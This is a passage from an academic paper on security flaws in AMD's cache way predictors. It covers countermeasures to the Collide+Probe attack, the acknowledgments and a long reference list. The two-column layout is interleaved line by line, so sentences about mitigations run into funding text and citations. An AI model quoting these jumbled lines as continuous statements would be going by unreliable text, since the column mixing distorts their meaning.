memory accesses of a victim running on a sibling thread. However, by the Austrian Research Promotion Agency (FFG) via the K-project
µTag collisions can still be observed after context switches or tran- DeSSnet, which is funded in the context of COMET - Competence
sitions between kernel and user mode. To mitigate Collide+Probe, Centers for Excellent Technologies by BMVIT, BMWFW, Styria, and
the state of the way predictor can be cleared when switching to Carinthia. It was also supported by the European Research Coun-
another user-space application or returning from the kernel. Ev- cil (ERC) under the European Union’s Horizon 2020 research and
ery subsequent memory access yields a misprediction and is thus innovation programme (grant agreement No 681402). This work
served from the L2 data cache. This yields the same result as invali- also benefited from the support of the project ANR-19-CE39-0007
dating the L1 data cache, which is currently a required mitigation MIAOUS of the French National Research Agency (ANR). Additional
technique against Foreshadow [74] and MDS attacks [16, 68, 75]. funding was provided by generous gifts from Intel. Any opinions,
However, we expect it to be more power-efficient than flushing the findings, and conclusions or recommendations expressed in this
L1D. To mitigate Spectre attacks [41, 44, 51], it is already neces- paper are those of the authors and do not necessarily reflect the
sary to invalidate branch predictors upon context switches [17]. As views of the funding parties.
invalidating predictors and the L1D cache on Intel has been imple-
mented through CPU microcode updates, introducing an MSR to REFERENCES
invalidate the way predictor might be possible on AMD as well. [1] Andreas Abel and Jan Reineke. 2013. Measurement-based Modeling of the Cache
Replacement Policy. In Real-Time and Embedded Technology and Applications
Uniformly-distributed Collisions. While the previously described Symposium (RTAS).
[2] Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida
countermeasures rely on either microcode updates or hardware García, and Nicola Tuveri. 2018. Port Contention for Fun and Profit. In S&P.
modifications, we also propose an entirely software-based miti- [3] Alex Christensen. 2015. Reduce resolution of performance.now. https://bugs.
gation. Our attack on an optimized AES T-table implementation webkit.org/show_bug.cgi?id=146531
[4] Ricardo Alves, Stefanos Kaxiras, and David Black-Schaffer. 2018. Dynamically
in Section 5.4 relies on the fact that an attacker can observe the key- disabling way-prediction to reduce instruction replay. In International Conference
dependent look-ups to the T-tables. We propose to map such secret on Computer Design (ICCD).
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.
[5] AMD. 2013. BIOS and Kernel Developer’s Guide (BKDG) for AMD Family 15h [40] Richard E Kessler. 1999. The alpha 21264 microprocessor. IEEE Micro (1999).
Models 00h-0Fh Processors. [41] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas,
[6] AMD. 2014. Software Optimization Guide for AMD Family 15h Processors. Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz,
[7] AMD. 2017. AMD64 Architecture Programmer’s Manual. and Yuval Yarom. 2019. Spectre Attacks: Exploiting Speculative Execution. In
[8] AMD. 2017. Software Optimization Guide for AMD Family 17h Processors. S&P.
[9] AMD. 2018. Software techniques for managing speculation on AMD processors. [42] Paul C. Kocher. 1996. Timing Attacks on Implementations of Diffe-Hellman, RSA,
[10] AMD. 2019. 2nd Gen AMD EPYC Processors Set New Standard for the Modern DSS, and Other Systems. In CRYPTO.
Datacenter with Record-Breaking Performance and Significant TCO Savings. [43] Robert Könighofer. 2008. A Fast and Cache-Timing Resistant Implementation of
[11] Antonio Barresi, Kaveh Razavi, Mathias Payer, and Thomas R. Gross. 2015. CAIN: the AES. In CT-RSA.
Silently Breaking ASLR in the Cloud. In WOOT. [44] Esmaeil Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and Nael
[12] Daniel J. Bernstein. 2004. Cache-Timing Attacks on AES. Abu-Ghazaleh. 2018. Spectre Returns! Speculation Attacks using the Return
[13] Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessan- Stack Buffer. In WOOT.
dro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTher- [45] Marcin Krzyzanowski. 2019. CryptoSwift: Growing collection of standard and
Spectre: exploiting speculative execution through port contention. In CCS. secure cryptographic algorithms implemented in Swift. https://cryptoswift.io
[14] Boris Zbarsky. 2015. Reduce resolution of performance.now. https://hg.mozilla. [46] Linux. 2019. Complete virtual memory map with 4-level page tables. https:
org/integration/mozilla-inbound/rev/48ae8b5e62ab //www.kernel.org/doc/Documentation/x86/x86_64/mm.txt
[15] Leon Groot Bruinderink, Andreas Hülsing, Tanja Lange, and Yuval Yarom. 2016. [47] Linux. 2019. Linux Kernel 5.0 Process (x86). https://git.kernel.org/pub/scm/
Flush, Gauss, and Reload–a cache attack on the BLISS lattice-based signature linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/process.c
scheme. In CHES. [48] Moritz Lipp, Daniel Gruss, Raphael Spreitzer, Clémentine Maurice, and Stefan
[16] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Ma- Mangard. 2016. ARMageddon: Cache Attacks on Mobile Devices. In USENIX
rina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Security Symposium.
Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking Data on Meltdown-resistant [49] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas,
CPUs. In CCS. Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval
[17] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Yarom, and Mike Hamburg. 2018. Meltdown: Reading Kernel Memory from User
Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A Space. In USENIX Security Symposium.
Systematic Evaluation of Transient Execution Attacks and Defenses. In USENIX [50] Fangfei Liu, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. 2015. Last-
Security Symposium. Level Cache Side-Channel Attacks are Practical. In S&P.
[18] Mike Clark. 2016. A new x86 core architecture for the next generation of com- [51] G. Maisuradze and C. Rossow. 2018. ret2spec: Speculative Execution Using Return
puting. In IEEE Hot Chips Symposium (HCS). Stack Buffers. In CCS.
[19] Stephen Crane, Andrei Homescu, Stefan Brunthaler, Per Larsen, and Michael [52] Clémentine Maurice, Nicolas Le Scouarnec, Christoph Neumann, Olivier Heen,
Franz. 2015. Thwarting Cache Side-Channel Attacks Through Dynamic Software and Aurélien Francillon. 2015. Reverse Engineering Intel Complex Addressing
Diversity. In NDSS. Using Performance Counters. In RAID.
[20] Joan Daemen and Vincent Rijmen. 2013. The design of Rijndael: AES-the advanced [53] Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss,
encryption standard. Carlo Alberto Boano, Stefan Mangard, and Kay Römer. 2017. Hello from the
[21] Helder Eijs. 2018. PyCryptodome: A self-contained cryptographic library for Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS.
Python. https://www.pycryptodome.org [54] Ahmad Moghimi, Gorka Irazoqui, and Thomas Eisenbarth. 2017. CacheZoom:
[22] Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2016. Jump How SGX Amplifies The Power of Cache Attacks. In CHES.
over ASLR: Attacking branch predictors to bypass ASLR. In MICRO. [55] Richard Moore. 2017. pyaes: Pure-Python implementation of AES block-cipher
[23] W. Shen Gene and S. Craig Nelson. 2006. MicroTLB and micro tag for reducing and common modes of operation. https://github.com/ricmoo/pyaes
power in a processor . US Patent 7,117,290 B2. [56] Louis-Marie Vincent Mouton, Nicolas Jean Phillippe Huot, Gilles Eric Grandou,
[24] Ben Gras, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2018. Translation and Stephane Eric Sebastian Brochier. 2012. Cache accessing using a micro TAG.
Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks. US Patent 8,151,055.
In USENIX Security Symposium. [57] Yossef Oren, Vasileios P Kemerlis, Simha Sethumadhavan, and Angelos D
[25] Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, and Cristiano Giuffrida. 2017. Keromytis. 2015. The Spy in the Sandbox: Practical Cache Attacks in JavaScript
ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS. and their Implications. In CCS.
[26] William Gropp, Ewing Lusk, Nathan Doss, and Anthony Skjellum. 1996. A high- [58] Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache Attacks and Coun-
performance, portable implementation of the MPI message passing interface termeasures: the Case of AES. In CT-RSA.
standard. Parallel computing (1996). [59] Colin Percival. 2005. Cache missing for fun and profit. In BSDCan.
[27] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, [60] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan
and Stefan Mangard. 2017. KASLR is Dead: Long Live KASLR. In ESSoS. Mangard. 2016. DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.
[28] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Man- In USENIX Security Symposium.
gard. 2016. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. [61] Moinuddin K Qureshi. 2019. New attacks and defense for encrypted-address
In CCS. cache. In ISCA.
[29] Daniel Gruss, Clémentine Maurice, and Stefan Mangard. 2016. Rowhammer.js: A [62] Chester Rebeiro, A. David Selvakumar, and A. S. L. Devi. 2006. Bitslice Imple-
Remote Software-Induced Fault Attack in JavaScript. In DIMVA. mentation of AES. In Cryptology and Network Security (CANS).
[30] Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. [63] Thomas Ristenpart, Eran Tromer, Hovav Shacham, and Stefan Savage. 2009.
Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA. Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party
[31] Daniel Gruss, Raphael Spreitzer, and Stefan Mangard. 2015. Cache Template Compute Clouds. In CCS.
Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security [64] David J Sager and Glenn J Hinton. 2002. Way-predicting cache memory. US
Symposium. Patent 6,425,055.
[32] Shay Gueron. 2012. Intel Advanced Encryption Standard (Intel AES) Instructions [65] Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to-
Set – Rev 3.01. Leak Forwarding: Leaking Data on Meltdown-resistant CPUs. arXiv:1905.05725
[33] Richard W Hamming. 1950. Error detecting and error correcting codes. The Bell (2019).
system technical journal (1950). [66] Michael Schwarz, Daniel Gruss, Samuel Weiser, Clémentine Maurice, and Stefan
[34] Joel Hruska. 2019. AMD Gains Market Share in Desktop and Laptop, Slips in Mangard. 2017. Malware Guard Extension: Using SGX to Conceal Cache Attacks.
Servers. https://www.extremetech.com/computing/291032-amd In DIMVA.
[35] Ralf Hund, Carsten Willems, and Thorsten Holz. 2013. Practical Timing Side [67] Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser, Clémentine Maurice,
Channel Attacks against Kernel Space ASLR. In S&P. Raphael Spreitzer, and Stefan Mangard. 2018. KeyDrown: Eliminating Software-
[36] Koji Inoue, Tohru Ishihara, and Kazuaki Murakami. 1999. Way-predicting set- Based Keystroke Timing Side-Channel Attacks. In NDSS.
associative cache for high performance and low energy consumption. In Sympo- [68] Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Steck-
sium on Low Power Electronics and Design. lina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-Privilege-
[37] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2015. S$A: A Shared Cache Boundary Data Sampling. In CCS.
Attack that Works Across Cores and Defies VM Sandboxing – and its Application [69] Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017.
to AES. In S&P. Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural
[38] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache Attacks in JavaScript. In FC.
attacks. In AsiaCCS. [70] Michael Schwarz, Martin Schwarzl, Moritz Lipp, and Daniel Gruss. 2019. Net-
[39] Yeongjin Jang, Sangho Lee, and Taesoo Kim. 2016. Breaking Kernel Address Spectre: Read Arbitrary Memory over Network. In ESORICS.
Space Layout Randomization with Intel TSX. In CCS.
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan